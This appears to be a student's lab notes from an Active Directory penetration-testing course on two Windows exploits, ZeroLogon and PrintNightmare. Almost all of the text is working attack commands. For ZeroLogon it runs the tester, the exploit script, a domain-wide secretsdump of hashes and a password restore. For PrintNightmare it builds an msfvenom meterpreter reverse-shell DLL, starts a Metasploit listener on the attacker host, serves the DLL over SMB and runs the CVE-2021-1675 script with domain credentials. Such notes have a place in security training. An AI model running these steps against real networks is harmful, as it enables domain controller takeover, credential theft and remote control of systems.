NEVER ZeroLogon!
Maybe PrintNightmare or Sam the Admin with permission. You can check without running (like ETERNAL BLUE)
What is ZeroLogon?
2020 Exploit, very critical bug.
Resets admin password to null
Check:
python3 zerologon_tester.py HYDRA-DC 192.168.218.136Exploit the DC:
python3 cve-2020-1472-exploit.py HYDRA-DC 192.168.218.136secretsdump.py -just-dc MARVEL/HYDRA-DC\$@192.168.218.136Done
To restore:
secretsdump.py administrator@192.168.218.136 -hashes adminHashHereFind the admin plain password hex and copy it
python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip 192.168.218.136 -hexpass pasteHexHereWhat is PrintNightmare?
Only needs a user account. Takes advantage of printer spooler. Allows users to add printers and runs as system privilege.
Check:
rpcdump.py @192.168.218.136 | egrep 'MS-RPRN|MS-PAR'Vulnerable:
Create a shell DLL to host:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.218.128 LPORT=5555 -f dll >shell.dll>New Terminal
Open Metasploit for meterpreter shell:
msfconsole
use multi/handler
optionsNo payload set so we need to set it to what we set before:
set payload windows/x64/meterpreter/reverse_tcp
optionsSet the rest of the options for the listener (meterpreter):
set LHOST 192.168.218.128 #Kali IP
set lport 5555 #what we set before
run>New Terminal
We need a file share:
smbserver.py share `pwd`>New Terminal
(that CVE py file is in impacket on ~):
python3 CVE-2021-1675.py marvel.local/fcastle:'Password1'@192.168.218.136 '\\192.168.218.128\home\kali\shell.dll